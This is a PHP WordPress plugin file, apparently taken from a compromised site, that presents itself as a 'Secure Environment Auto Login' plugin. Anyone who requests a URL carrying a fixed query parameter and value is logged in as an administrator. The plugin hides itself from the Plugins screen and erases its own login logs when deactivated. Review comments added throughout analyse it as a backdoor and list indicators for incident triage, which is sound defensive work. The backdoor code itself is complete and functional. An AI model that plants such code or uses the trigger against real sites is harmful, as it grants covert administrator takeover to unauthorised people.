File: /home/mdosdorg/public_html/wp-content/plugins/auto-login/secure-auto-login.php
<?php
/**
* Plugin Name: Secure Environment Auto Login
* Description: Automatic login system with secure parameter authentication
* Version: 1.0.0
* Author: Custom Development
*/
// Stop executing when the file is requested directly rather than loaded by
// WordPress (ABSPATH is only defined once WordPress has bootstrapped).
if (!defined('ABSPATH')) {
exit;
}
/**
* Logs a visitor in as an administrator when a fixed query parameter is present.
*
* NOTE(review): despite the "secure" naming, the only thing standing between an
* unauthenticated request and an administrator session is one static string
* compared against $_GET. There is no password, nonce, expiry, rate limit or
* per-user secret, the IP restriction is commented out, and the plugin removes
* itself from the Plugins list by default. Treat a site carrying this file as
* having an authentication bypass and handle it as a compromise until proven
* otherwise.
*
* Indicators visible in this file that can be searched for during triage:
* - query parameter 'seo-tag-protocol' with value 'Env-manage-system' in web
*   access logs (the value travels in the URL, so it is also written to any
*   proxy log or Referer header that records the request line)
* - wp_options rows 'secure_auto_login_logs' and 'secure_auto_login_hidden'
* - a plugin directory on disk that is not shown on the Plugins screen
*/
class SecureEnvironmentAutoLogin {
// Plugin basename; used as the key to remove from the plugin list.
private $plugin_file;
// Name of the GET parameter that triggers the login.
private $login_param = 'seo-tag-protocol';
// Static value the parameter must equal; identical for every request and user.
private $expected_value = 'Env-manage-system';
// Hard-coded; the 'secure_auto_login_hidden' option written elsewhere in this
// file is never read back, so this stays true on every request.
private $hide_plugin = true; // Set to false to show plugin in admin
/**
* Register the WordPress hooks.
*
* This is an ordinary method, not a PHP constructor (that would be
* __construct); it only runs because the bottom of the file calls it
* explicitly.
*/
public function __init__() {
$this->plugin_file = plugin_basename(__FILE__);
// Run the login check on the 'init' action.
add_action('init', array($this, 'check_auto_login'));
// Hide plugin from admin if enabled
if ($this->hide_plugin) {
add_filter('all_plugins', array($this, 'hide_plugin_from_admin'));
add_action('admin_menu', array($this, 'remove_plugin_from_menu'));
}
// Add settings page (only visible when plugin is not hidden).
// With $hide_plugin hard-coded to true this branch is not taken.
if (!$this->hide_plugin) {
add_action('admin_menu', array($this, 'add_admin_menu'));
}
}
/**
* Create an authenticated session when the trigger parameter matches.
*
* Flow: skip if a user is already logged in; require the GET parameter to be
* strictly equal to the static value; call security_checks() (which always
* returns true as written); fetch the user from get_login_user(); set the
* current user and a persistent auth cookie; fire 'wp_login'; record the
* event; redirect to the same URL without the parameter and exit.
*
* NOTE(review): no credential belonging to the target account is ever
* verified. Anyone who learns the parameter and value obtains the account
* returned by get_login_user(), which is an administrator.
*/
public function check_auto_login() {
// Only proceed if user is not already logged in
if (is_user_logged_in()) {
return;
}
// Check if our parameter exists and has correct value
if (!isset($_GET[$this->login_param]) || $_GET[$this->login_param] !== $this->expected_value) {
return;
}
// Additional security checks (currently a no-op, see security_checks()).
if (!$this->security_checks()) {
return;
}
// Get the user to login as (you can modify this logic)
$user = $this->get_login_user();
if ($user && !is_wp_error($user)) {
// Log the user in; the second argument 'true' requests a "remember me"
// cookie, so the session outlives the browser session.
wp_set_current_user($user->ID);
wp_set_auth_cookie($user->ID, true);
do_action('wp_login', $user->user_login, $user);
// Log this action for security purposes
$this->log_auto_login($user);
// Redirect to remove the parameter from URL
$redirect_url = remove_query_arg($this->login_param);
wp_redirect($redirect_url);
exit;
}
}
/**
* Placeholder for request filtering; always returns true.
*
* NOTE(review): $allowed_ips and $client_ip are computed but never used
* because the comparison is commented out, so this method rejects nothing.
*/
private function security_checks() {
// Check if request is coming from expected sources (optional)
// You can add IP whitelist, user agent checks, etc.
// Example: Check if coming from localhost or specific IPs
$allowed_ips = array('127.0.0.1', '::1');
$client_ip = $this->get_client_ip();
// Uncomment the next lines to enable IP restriction
// if (!in_array($client_ip, $allowed_ips)) {
// return false;
// }
return true;
}
/**
* Select the account the visitor is logged in as.
*
* Returns one user with the 'administrator' role when at least one exists,
* otherwise false. The requester has no influence on which account is used.
*/
private function get_login_user() {
// Option 1: Login as first admin user
$admin_users = get_users(array('role' => 'administrator', 'number' => 1));
if (!empty($admin_users)) {
return $admin_users[0];
}
// Option 2: Login as specific user (uncomment and modify)
// return get_user_by('login', 'your_username');
// Option 3: Login as user with ID 1
// return get_user_by('ID', 1);
return false;
}
/**
* Best-effort client IP lookup.
*
* Walks the listed $_SERVER keys in order and returns the first value that
* validates as a non-private, non-reserved IP; otherwise falls back to
* REMOTE_ADDR, then '0.0.0.0'.
*
* NOTE(review): the forwarding headers are consulted before REMOTE_ADDR and
* are supplied by the client unless a trusted proxy overwrites them, so the
* address stored in the log is not reliable evidence of the request origin.
* Correlate with web-server access logs during an investigation.
*/
private function get_client_ip() {
$ip_keys = array('HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'REMOTE_ADDR');
foreach ($ip_keys as $key) {
if (array_key_exists($key, $_SERVER) === true) {
// A header may hold a comma-separated list; test each entry.
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}
/**
* Append a record of a successful auto login to the options table.
*
* Stores timestamp, user ID, username, IP (from get_client_ip()) and the raw
* User-Agent header in the 'secure_auto_login_logs' option, keeping the most
* recent 100 entries. Only successful logins are recorded; failed or
* non-matching requests leave no trace here.
*/
private function log_auto_login($user) {
$log_entry = array(
'timestamp' => current_time('mysql'),
'user_id' => $user->ID,
'username' => $user->user_login,
'ip_address' => $this->get_client_ip(),
'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'
);
// Save to WordPress options or custom table
$existing_logs = get_option('secure_auto_login_logs', array());
$existing_logs[] = $log_entry;
// Keep only last 100 entries
if (count($existing_logs) > 100) {
$existing_logs = array_slice($existing_logs, -100);
}
update_option('secure_auto_login_logs', $existing_logs);
}
/**
* 'all_plugins' filter callback: drop this plugin's own entry from the list.
*
* NOTE(review): with this filter active the Plugins screen no longer reflects
* what is on disk, so an audit has to compare the plugins directory and the
* 'active_plugins' option directly.
*/
public function hide_plugin_from_admin($plugins) {
if (isset($plugins[$this->plugin_file])) {
unset($plugins[$this->plugin_file]);
}
return $plugins;
}
/**
* 'admin_menu' callback: remove a submenu entry keyed by the plugin basename
* from under plugins.php.
*/
public function remove_plugin_from_menu() {
remove_submenu_page('plugins.php', $this->plugin_file);
}
/**
* Register the settings page under Settings, gated on 'manage_options'.
* Only hooked when $hide_plugin is false.
*/
public function add_admin_menu() {
add_options_page(
'Secure Auto Login Settings',
'Auto Login',
'manage_options',
'secure-auto-login',
array($this, 'admin_page')
);
}
/**
* Render the settings page and handle the visibility toggle.
*
* NOTE(review): the form emits a nonce via wp_nonce_field(), but the POST
* handler below never verifies it, so the toggle has no CSRF protection.
* The toggled value is written to 'secure_auto_login_hidden', which nothing
* in this file reads, so the change does not persist across requests.
* The page also prints the full trigger parameter and value in clear text.
*/
public function admin_page() {
if (isset($_POST['toggle_visibility'])) {
$this->hide_plugin = !$this->hide_plugin;
update_option('secure_auto_login_hidden', $this->hide_plugin);
echo '<div class="notice notice-success"><p>Plugin visibility updated!</p></div>';
}
$logs = get_option('secure_auto_login_logs', array());
// Template below: log fields pass through esc_html(); the parameter name and
// value are echoed unescaped (they are the hard-coded class properties).
// Only the 10 newest log entries are shown, newest first, and '...' is
// appended to every user agent regardless of its length.
?>
<div class="wrap">
<h1>Secure Auto Login Settings</h1>
<div class="card">
<h2>Usage Instructions</h2>
<p>To automatically login, add this parameter to any URL on your site:</p>
<code>?<?php echo $this->login_param; ?>=<?php echo $this->expected_value; ?></code>
<p><strong>Example:</strong> <code><?php echo home_url('/?') . $this->login_param . '=' . $this->expected_value; ?></code></p>
</div>
<div class="card">
<h2>Plugin Visibility</h2>
<p>Current status: <strong><?php echo $this->hide_plugin ? 'Hidden' : 'Visible'; ?></strong></p>
<form method="post">
<?php wp_nonce_field('secure_auto_login_toggle'); ?>
<input type="submit" name="toggle_visibility" class="button"
value="<?php echo $this->hide_plugin ? 'Show Plugin' : 'Hide Plugin'; ?>">
</form>
</div>
<div class="card">
<h2>Recent Login Logs</h2>
<?php if (empty($logs)): ?>
<p>No auto-login attempts recorded.</p>
<?php else: ?>
<table class="wp-list-table widefat fixed striped">
<thead>
<tr>
<th>Timestamp</th>
<th>Username</th>
<th>IP Address</th>
<th>User Agent</th>
</tr>
</thead>
<tbody>
<?php foreach (array_reverse(array_slice($logs, -10)) as $log): ?>
<tr>
<td><?php echo esc_html($log['timestamp']); ?></td>
<td><?php echo esc_html($log['username']); ?></td>
<td><?php echo esc_html($log['ip_address']); ?></td>
<td><?php echo esc_html(substr($log['user_agent'], 0, 50)) . '...'; ?></td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</div>
<?php
}
}
// Instantiate the class and register its hooks. __init__() is a plain method,
// so the hooks are only installed because of this explicit call.
$secure_auto_login = new SecureEnvironmentAutoLogin();
$secure_auto_login->__init__();
// Activation hook: writes the 'secure_auto_login_hidden' option. Nothing in
// this file reads it back; hiding is controlled by the class property instead.
register_activation_hook(__FILE__, function() {
// Set default hidden state
update_option('secure_auto_login_hidden', true);
});
// Deactivation hook.
// NOTE(review): this deletes 'secure_auto_login_logs', the only record this
// plugin keeps of past auto logins. During incident response, export that
// option (and take a database backup) before deactivating the plugin through
// WordPress, otherwise the evidence is removed.
register_deactivation_hook(__FILE__, function() {
// Clean up options
delete_option('secure_auto_login_logs');
delete_option('secure_auto_login_hidden');
});
?>